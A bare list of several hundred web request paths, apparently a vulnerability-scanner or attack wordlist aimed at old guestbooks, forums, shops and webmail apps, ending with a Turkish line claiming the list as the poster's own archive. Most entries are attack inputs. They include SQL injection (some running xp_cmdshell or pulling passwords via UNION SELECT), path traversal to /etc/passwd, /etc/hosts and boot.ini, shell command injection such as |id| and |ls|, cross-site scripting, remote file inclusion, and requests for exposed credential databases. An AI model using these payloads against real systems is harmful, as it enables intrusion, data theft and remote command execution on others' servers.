/myguestBk/admin/delEnt.asp?id=avalidnewsnumber
/sysuser/docmgr/iecreate.stm?template=%2e%2e%2f
/sysuser/docmgr/ieedit.stm?url=%2e%2e%2f
/jgb_eng_php3/jgb.php3
/jgb_eng_php3/cfooter.php3
/scozbook/add.php
/scozbook/view.php?PG=notexisting
/cgi-bin/cc_guestbook.pl
/cgi-bin/cc_log.pl
/docman/new.php
/patch/index.php
/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
/admin/script.php?data=_script_dot_php_with_php_source_in side
/modules/glossaire/glossaire-aff.php
/gb.asp
/news/news.mdb
/upnp/service/WANPPPConnection
/cgi-bin/webc.cgi
/cgi-bin/webc.cgi/g/
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/sources/functions.php?skinid=huhh
/forum/sources/functions.php?skinid=huhh
/forums/sources/functions.php?skinid=huhh
/gb_eintragen.asp
/gb/gb_eintragen.asp
/guestbook/gb_eintragen.asp
/gaestebuch/gb_eintragen.asp
/show_cart.inc.php
/store/show_cart.inc.php
/shop/show_cart.inc.php
/shop/stats.php
/store/stats.php
/stats.php
/cgi-bin/sgb/superguest.cgi
/cgi-bin/sgb/superguestconfig
/guestbook/admin/o12guest.mdb
/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select% 20userid%20from%20users)
/guestbook/new_entry.asp
/gaestebuch/new_entry.asp
/settings/site.ini
/kernel/classes/ezrole.php
/kernel/classes/ezsearch.php
/kernel/classes/ezsearchlog.php
/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
/Program%20Files/BadBlue/PE/ext.ini
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/guestbook/database/mpcsoftweb_guestdata.mdb
/guest/database/mpcsoftweb_guestdata.mdb
/isapi/count.pl
/xmb/member.php
/cgi-bin/readfile.tcl?file=/etc/master.passwd
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/cgi-bin/album.pl?full=1
/openbb/board.php?
/board.php?
/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\WINNT&File:Name=WIN.INI&View=ViewFile
/ideabox/include.php?gorumDir=anotherhost_with_notification .php
/biztalkhttpreceive.dll?Ax265
/biztalktracking/rawdocdata.asp?nDocumentKey=1*@tnDirection=1;exec master.dbo.xp_cmdshell ’dir’--
/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1*@tnDirecti on=1;exec master.dbo.xp_cmdshell ’dir’--
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/recman.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/admin.dll?CompanyID=BOF
/Scripts/SLwebmail/showlogin.dll?Language=BOF
/Scripts/SLwebmail/ShowGodLog.dll?FILE=c:%5c%5cBOOT.INI
/Scripts/SLwebmail/WebMailReq.dll?pathdisclosure
/shop/normal_html.cgi?file=|id|
/shop/member_html.cgi
/yabbse/ssi.php?sourcedir=otherhost_with_Errors_php
/ttforum/index.php?action=news;board=1;template=another_ser ver;ext=help
/modules/forum/src/Profile.php
/src/Profile.php
/shop/normal_html.cgi?file=../../../../../../etc/hosts%00
/forum/register.asp??mode=DoIt&Email=’%20exec%20master..xp_cmdshell%20’dir’%20--&Name=snitz
/phorum/download.php
/phorum/register.php
/intranet/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC
/owl/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC
/forum/private.php
/autohtml.php?op=modload&mainfile=x&name=badfilething
/poster/mem.php
/zboard/mem.php
/supporter/tupdate.php?groupid=change&sg=groupid*description=char(97*98*99*100)&id=10
/internal.sws?../../windows/system.ini
/admin/templates/header.php?admin_root=anotherserverwith_templates/header.inc.php&cookie_ttcms_user_admin=1
/xmbforum/member.php
/board/admin_pass.php
/admin_pass.php
/textportal/admin_pass.php
/admin/objects.inc.php4?Server[path]=anothersrv&Server[language_file]=cmd.php4
/board/index.php?action=imprefs_ttforum_ttcms
/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr’;exec%20master..xp_cmdshell’p ing%2010.10.10.11’;--
/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0=add&a1=root&a2=%5C
/syslog.htm
/vgn/ac/edit
/vgn/ac/index
/vgn/vr/Editing
/vgn/vr/Select
/vgn/legacy/edit
/vgn/ppstats
/vgn/login?errInfo="%2b%20****************%20%2b"
/vgn/style
/vgn/legacy/save?needs_vgn_creds_Cookie
/board/index.php?needs_php_code_in_User-Agent
/news/p-news.php
//admin/admin.shtml
/bandwidth/index.cgi?action=showmonth&year=_xss_
/shoutbox.php?conf=../../../../../../../etc/hosts
/board/philboard_admin.asp?with_cookie_philboard_admin=Tr ue
/database/philboard.mdb
/forum/database/philboard.mdb
/psynch/nph-psa.exe?lang=
/psynch/nph-psf.exe?lang=
/psynch/nph-psf.exe?css=">_some_XSS
/psynch/nph-psa.exe?css=">_some_XSS
/psynch/nph-psf.exe?css=site_with_file
/psynch/nph-psa.exe?css=site_with_file
/b2-tools/gm-2-b2.php?b2inc=ahostwith_b2functions.php
/zentrack/index.php?configFile=/../../../../../etc/hosts
/manage/login.asp?User=admin&Pass=’+or+’1’=’1
/browse_item_details.asp?Item_ID=sql_injection
/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
/admin/upload.htm
/admin/upload.asp
/upload.asp
/database/db2000.mdb
/b2-include/b2functions.php?b2inc=anotherhostwith_lj_update.ph p
/blog.header.php?posts=sql_inj
/blog.cgi?submit=ViewFile&month=01&year=2004&file=|id|
/blog/blog.cgi?submit=ViewFile&month=01&year=2004&file=|id|
/b2-include/b2menutop.php?b2inc=anotherhostwith_b2menutop.txt
/user/
/user/admin.txt
/info.dat
/servlet/psoft.hsphere.CP/
/pm/lib.inc.php?pm_path=anothewrhost_with_config.txt&sfx=.txt
/phpBB2/viewtopic.php?sid=1&topic_id=-1&view=newest
/tutos/file/file_select.php?msg=xss_code
/tutos/file/file_new.php?link_id=1065&fileupload_possible_file_in_tutos_repository_numbe r_filenumber_FILE
/XMBforum/member.php?action=viewpro&member=admin<script>alert(’x’)<%2fscript>
/XMBforum/buddy.php?action=<script>alert(’x’)</script>&buddy=<script>alert(’XSS’)</script>
/phpBB/viewtopic.php?topic_id=xss_things
/WebAdmin.dll?View=Logon_and_User_POSTVARoverflow
/photorate/new.php
/pafiledb/includes/team/file.php?fileupl_possib
/pafiledb/pafiledb.php
/moregroupware/modules/contact/index.php
/moregroupware/modules/
/scripts/nsiislog.dll?
/filemanager/index.php3?action=telecharger&fichier=/etc/hosts
/filemanager/index.php?action=telecharger&fichier=/etc/hosts
/cgi-bin/forum/config.pl?form=0
/cgi-bin/forum/webbbs_config.pl?
/megabook/admin.cgi?default_pass_is_megabook
/megabook/files/20/setup.db
/eshop/10Expand.asp?ProductCode=’
/eshop/20Review.asp?ProductCode=’
/addressbook/index.php?xssthings
/shopexd.asp?catalogid=sql_inject
/store/shopexd.asp?catalogid=sql_inject
/shop/shopexd.asp?catalogid=sql_inject
/shopping/shopexd.asp?catalogid=sql_inject
/productcart/pc/Custvb.asp?redirectUrl=&Email=’+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
/produccart/pcadmin/login.asp?idadmin=’+or+1=1--+
/_vti_bin/fpcount.exe/
/w-agora/index.php
/wagora/index.php
/forum/download_forum.php
/forums/download_forum.php
/board/ssi.php
/forum/ssi.php
/forums/ssi.php
/forum/sm_install.php
/forums/sm_install.php
/ProductCart/pc/msg.asp?message=xssthings
/news51/newsdata/data/user.idx
/forum51/forumdata/data/user.idx
/board51/boarddata/data/user.idx
/news/newsdata/data/user.idx
/forum/forumdata/data/user.idx
/board/boarddata/data/user.idx
/qshop/admin/
/qshop/admin/upload.htm
/admin/data_passwd.dat
/forum/mainfile.php?MAIN_PATH=anotherhost_with_config.php
/view.tmpl?testfile=filewithdirtrav
/question/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/download.php?filename=../../../../../../../../../../../../etc/hosts
/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/etc/****dot.conf
/****dot/index.pl
/blackbook/index.php
/blackbook/data/data.dat
/cgi-bin/search.cgi?ul=BOF6000ortmpl=xxx
/htmltonuke.php?filnavn=xssthings%20example.html
/Data/settings.xml
/store/sfError.asp?sfid=20212&reason=xssscripts
/elitenews/stats.php
/elitenews/login.html
/admin/settings.inc.php
/admin/login.asp?pass=1st&user=sqlinject
/eventcal2.php.php?path_simpnews=anotherhostwith_co nfig.php
/eventscroller.php?path_simpnews=anotherwith_config .php
/node/view/666
/atomicboard/index.php?********=../../../../../../etc/hosts
/AtomicBoard-0.6.2/index.php?********=anything
/webcalendar/
/ashweb/ashnews.php?pathtoashnews=remotehost_with_ashproje cts_newsconfig.php
/ashnews.php?pathtoashnews=remotehost_with_ashproje cts_newsconfig.php
/do_subscribe?showuser=BOFx?
/add_acl?folder=~BOFx@localhost/INBOX&add_name=lucas
/do_map?action=new&oldalias=eso&alias=**********alert(****************);</script>&folder=public&user=lucascavadora
:8099/admin/tasks.asp
/admin/tasks.asp
:8099/admin/users/users.asp
/admin/users/users.asp
:8099/admin/default.asp
/admin/default.asp
:8099/users/user_setpassword.asp
/users/user_setpassword.asp
/html/jsp/fnd/aoljtest.jsp
/exchange/root.asp?acs=anon
/guestbook/guestbookdat
/guestbook/pwd
/Admin.po?proceed=yes
/guestbook/admin.php
/fndwrr.exe
/fndwrr
/hp/device/this.LCDispatcher
/admin/db.php
/moregroupware/modules/webmail2/index.php
/moregroupware/modules/webmail2/inc/
/pbl/index.php
/nphp/nphpd.php?nphp_config[LangFile]=/etc/hosts
/pass_done.php?Submit=1&email=’%20OR%203%20IN%20(1*2*3)%20INTO%20OUTFILE%2 0’/tmp/file.txt
/shopping/shopexd.asp
/shop/shopexd.asp
/shopexd.asp
/guestbook/sign.asp
/jongeren/Gastenboek/sign.asp
/cgi-bin/sbcgi/sitebuilder.cgi
/webcalendar/colors.php?color=xssthings
/cgi-bin/esp?PAGE=xssthings
/gallery/displayCategory.php?basepath=http://anotherhost_with_imageFunctions.php
/gallery/displayCategory.php?adminpath=http://anotherhost_with_fileFunctions.php
/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
/docs/NED?action=retrieve&********=http://www.nokia.com
/auth.inc.php?admin=sql_things_base64_encoded
/cgi-bin/math_sum.mscgi?a=BOV_87_chars
/mambo/banners.php?op=click&bid=100%2f*+
/powerslave*id*10;*nodeid**_language*uk.html
/cgi-bin/utm/admin?cmd=full_view&sid=q“%20OR%201=1%20OR%20“q“=“q
/cgi-bin/utm/utm_stat?cmd=user_report&sid=q“%20OR%201=1%20OR%20“q“=“q
/cgi-bin/utm/utm_stat?cmd=change_lang&lang=ru“*%20bill=10000*%20lang=“ru&sid=validSID
/exec/MsmSetup.exe?tst
/public/exec/MsmSetup.exe?tst
/cgi-bin/MsmSetup.exe?tst
/cgi-bin/MsmFind.exe
/images/?pattern=/*&sort=name
/debug/echo?name=**********alert(’hello’);</script>
/debug/dbg?host=**********alert(’hello’);</script>
/debug/showproc?proc=**********alert(’hello’);</script>
/debug/errorInfo?title=**********alert(’hello’);</script>
/thread/search.asp
/thread/default.asp?orderby=Author
/cboard/cboard.asp?cbid=1
/cboard/post.asp?cbid=1
/rbdforum-standalone/login.asp
/rbdforum/login.asp
/mail/m602cl3w.exe?A=GetFile&U=9&DL=0&FN=../../../boot.ini
/admin/header.php?voir=1&skinfile=skin/../../../etc/hosts
/faqman/index.php?op=view&t=518">xssthins
/filemgmt/brokenfile.php?lid=17’/“%3sqlinject
/index.php?topic=te’st/sqlinject
/forum/viewtopic.php?forum=1&showtopic=1’0/sqlinject
/staticpages/index.php?page=test’test/sqlinject
/filemgmt/visit.php?lid=1’1’0/sqlinject
/filemgmt/viewcat.php?cid=’6/sqlinject
/comment.php?type=filemgmt&cid=filemgmt-1’70/sqlinject
/comment.php?mode=display&sid=filemgmt-XXX&title=sqlinject
/filemgmt/singlefile.php?lid=17’/0/sqlinject
/dcp/advertiser.php?adv_logged=1&username=1&password=qwe’sqlthings
/dcp/lostpassword.php?action=lost&[email protected]
/wordpress/index.php?cat=100)%09or%090=0%09or%09(0=1
/b2/index.php?cat=100)%09or%090=0%09or%09(0=1
/blog/index.php?cat=100)%09or%090=0%09or%09(0=1
/servlet/ContentServer?pagename=xssthings
/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/file.php
/admin/auth.php?emml_admin_path=http://somehost_with_auth_func.php
/emml_email_func.php?emml_path=http://somehost_with_class.html.mime.mail.php
/admin/auth.php?emgb_admin_path=http://somehost_with_auth_func.php
/tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
/gallery/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/cgi-bin/click.cgi
/contacts.php?cal_dir=anotherhost_with_vars.inc_or_ prefs.inc
/convert-date.php?cal_dir=anotherhost_with_vars.inc_or_pref s.inc
_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/cpcommerce/_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/bytehoard/index.php?infolder=../../../../
/godllink/admin/admin.php
/deskpro_v1/faq.php?cat=45’
/deskpro_v1/view.php?ticketid=1’&ticket_pass=
/forum/pm_buddy_list.asp?name=A&desc=xss_things=“&code=1
/cgi-bin/cart.pl?db=’
/include/config.inc.php?lvc_include_dir=server_with__slash_ db_slashdb_mysql.inc.php
/admin/common.inc.php?basepath=anotherhost_with_lang_engl ish.php
/nfuse/asp/launch.asp
/citrix/****framexp/default/login.asp?NFuse_LogoutId=On&NFuse_MessageType=Error&NFuse_Message=xss_things
/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=xssthings
/post_message_form.asp?mode=quote&PID=1111&FID=1&TID=11&TPN=1
/trace.axd
/http-commander/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/http-commander/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/http-commander/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/profile.php?mode=viewprofile&u=’sql_injection
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
/cgi-bin/dose.pl?daily&somefile.txt&|ls|
/forum/register_new_user.asp?ForumID=0
/_vti_bin/_vti_aut/fp30reg.dll
/php-coolfile/action.php?action=edit&file=config.php
/phpwebfilemgr/index.php?f=../../../
/guest/insert.inc.php?path=another_host_with_data.inc.php
/gbook/insert.inc.php?path=another_host_with_data.inc.php
/guestbook/insert.inc.php?path=another_host_with_data.inc.php
/gaestebuch/insert.inc.php?path=another_host_with_data.inc.php
/ticketlogin
/phpBB2/search.php?search_id=1\
/vpasp/shopdisplayproducts.asp?cat=qwerty’
/vpasp/shopsearch.asp
/_layouts/settings.htm
/ldap/cgi-bin/ldacgi.exe?Action=**********alert(888)</script>
/shopping/shopdisplayproducts.asp?id=1&cat=xss_things
/php-nuke/admin.php?op=login&pwd=123&aid=Admin’sql_stuff
/php-nuke/modules.php?name=Surveys&pollID=a’sql_inject
/modules.php?name=Surveys&pollID=a’sql_inject
/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20>%20%69 %64`%20."&websiteurl=a&br_username=a&session_id=0&cgipath=.
/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
/sendeditfile
/runfile
/admin/config.php/edp_relative_path=host_with__admin_serverdata.php
/includes/hotnews-engine.inc.php3?config[header]=host_file_etc
/includes/hotnews-engine.inc.php?config[header]=host_file_etc
/includes/hnmain.inc.php3?config[incdir]=anotherhost_with_func.inc.php3
/includes/hnmain.inc.php3?config[incdir]=another_host_withhndefs.inc.php3
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=../cgi-bin/useradmin.pl%00.html
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=|ls+-als|
/vbb/calendar.php?s=&action=edit&eventid=14_sql_injection_things
/calendar.php?s=&action=edit&eventid=14_sql_injection_things
/phpgedview/authentication_index.php?PGV_BASE_DIRECTORY=anothe r_host
/phpgedview/functions.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/config_gedcom.php?PGV_BASE_DIRECTORY=another_host
/manpage/index.php?command=/etc/resolv.conf
/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[0]=
/clippings.php?action=add&id=Blah
/gdbi.php?action=connect&username=Blah
/placelist.php?level=1_sql_things
/placelist.php?level=1&parent[0]=_sql_things
/placelist.php?level=2&parent[0]=&parent[1]=_sql_things
/timeline.php?pids=_sql_things
/dansguardian/edit.cgi?file=xxx
/photoalbum/admin/adminlogin.asp
/modules/mod_mainmenu.php
/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1_sql_things
/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=c:\windows\web\folder
/nsn/env.bas
/lcgi/lcgitest.nlm
/isqlplus?action=logon&username=xssthings&password=xssthings
/cgi-bin/forumsdb/intraforum_db.cgi
/gallery/init.php?HTTP_POST_VARS=xxx&GALLERY_BASEDIR=somedir
/directory/gotopage.cgi?13686+/../../../../../../etc/hosts
/directory/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/shop/gotopage.cgi?13686+/../../../../../../etc/hosts
/shop/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/more.php?id=’sql_things
/store/more.php?id=’sql_things
/shop/more.php?id=’sql_things
/_phpmyadmin/
/_phpmyadmin_/
/phpmyadmin/
/php_my_admin/
/phpmyadmin/export.php?what=../../../../../../etc/hosts%00
/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=host_with_script
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=host_with_script
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=host_with_script
/WebzEdit/done.jsp?message=’);xss_things;a=escape(’
//app/idxam.html
//app/idxas.html
//app/idxasp.html
//admin/aindex.htm
/directory/functions.php?clang=../../../../../../../../../../../../etc/hosts
/Carts/Computers/viewCart.asp?userID=2893225125722634’sql_things--&viewID=48
/resend.asp?ID=sql_things
/news_view.asp?ID=sql_things
/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20passwor d*null*99%20FROM%20xmb_members%20WHERE%20uid=1%20L IMIT%201%20/*
/xmb/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20passwor d*null*99%20FROM%20xmb_members%20WHERE%20uid=1%20L IMIT%201%20/*
/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00
/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/acart/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/shop/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf*Listen 8000%0A%0DAccessLog "|../../../../../../winnt/system32/cmd.exe /c dir")
/payonline.asp
/shop/payonline.asp
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|ls|
/cgi-bin/store/__SQLUSER__
/gemitel/html/affich.php?base=_some_server_with_sp-turn.php
/html/affich.php?base=_some_server_with_sp-turn.php
/mail/src/compose.php?mailbox="script_stuff
/webmail/src/compose.php?mailbox="script_stuff
/squirrelmail/src/compose.php?mailbox="script_stuff
/main.cgi?next_file=/etc/hosts
/main.cgi?next_file=/etc/hosts
/ssi.php?a=out&type=xml&f=0)
/ipb/ssi.php?a=out&type=xml&f=0)
/board/ssi.php?a=out&type=xml&f=0)
/singapore/data/adminusers.csv
/gallery/data/adminusers.csv
/gal/data/adminusers.csv
/data/adminusers.csv
/scripts/cart32.exe/GetLatestBuilds?cart32=xssthings
/help.php?file=xss_thing
/cgi-bin/ShellExample.cgi
/fcgi-bin/php.ini
/cgi-bin/php.in
/cgi-bin/web_store.cgi?page=.html|ls|
/go.cgi?|id|
/go.cgi?artarchive=|id|
/endon/mod.php?mod=publisher&op=viewcat&cid=<b>test</b%3
/system/bin/user/p0177.php
/system/bin/user/p0184.php
/system/bin/upload/p0199.php
/system/bin/upload/p0204.php
/system/bin/upload/p0227.php
/system/bin/binbackoffice/p0104.php
/system/bin/page/p0190.php
/includes/functions/pmwh.php
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=’;’&Eid=criolabs’
/mantis/core/bug_api.php?t_core_dir=_another_host_with_relation ship_api.php
/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
/disk_c
/%2E%2E%5Csystem.log
/modules/dictionary/search.php?terme=">**********alert(1)</script>
/adminSection/index.asp?ShowMsg=(XSS)
/adminSection/ChangePassword.asp?ShowMsg=(XSS)
/adminSection/users_list.asp?ShowMsg=(XSS)
/adminSection/users_add.asp?ShowMsg=(XSS)
/adminSection/index_next.asp?
/mwadmin/index.php?real_Cookie_is_auth=1;_uId=1
/fileCopy.asp?INPUTFILE=&OUTPUTFILE=
/copyFile.asp
/yabbse/Sources/Admin.php
/cgi-bin/sitenews/sitenews.cgi?edit
/cgi-bin/sitenews.cgi?edit
/sitenews.cgi?edit
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=other_host_
//PUBLIC/ADMIN/INDEX.HTM
/include/livre_include.php
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/ajfork/inc/main.mdu
/_maincfgret.cgi
/NotifyAction.asp?action=AddType&instance=Beeper&end=end
/phplinks/index.php?show=ruaosleas
/bb_lib/checkdb.inc.php?libpach=another_host_with__more.ph p
/secure%5Clogin.aspx
/guest/AWSguest.php
/guestbook/AWSguest.php
/registry/AWSguest.php
/evoweb/?EvoCmd=console
/evo/web/?EvoCmd=console
/messageboard/Forum.asp?QuestionNumber=’+sql_stuff&Find=1&Category=1
/cms/adm_pages.php?and_/index.php_qm_inc=anotherhost_with_dot_php
/ocp-103/index.php?req_path=another_host_with_funcs_dot_php
/app_sta.stm?router_things
/cgi-bin/apexec.pl?template=/etc/hosts%%0000.html
/cphp/index.php?op=invparam_and_index_dot_php_op_include s_any_file
/scripts/slxweb.dll/getfile?type=Library&file=_any_file_tata
/dosearch.php?Name=’ OR U_Password=’db5c82346d770f48bdd8929094c0c695’/*
/portal/diag/
/jaf/index.php?show=../../../../../../../etc/hosts
/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=host_with_includes/functions_selects.php
tamamen bnim arşivdir ///edit.kimse hırsız değil; )
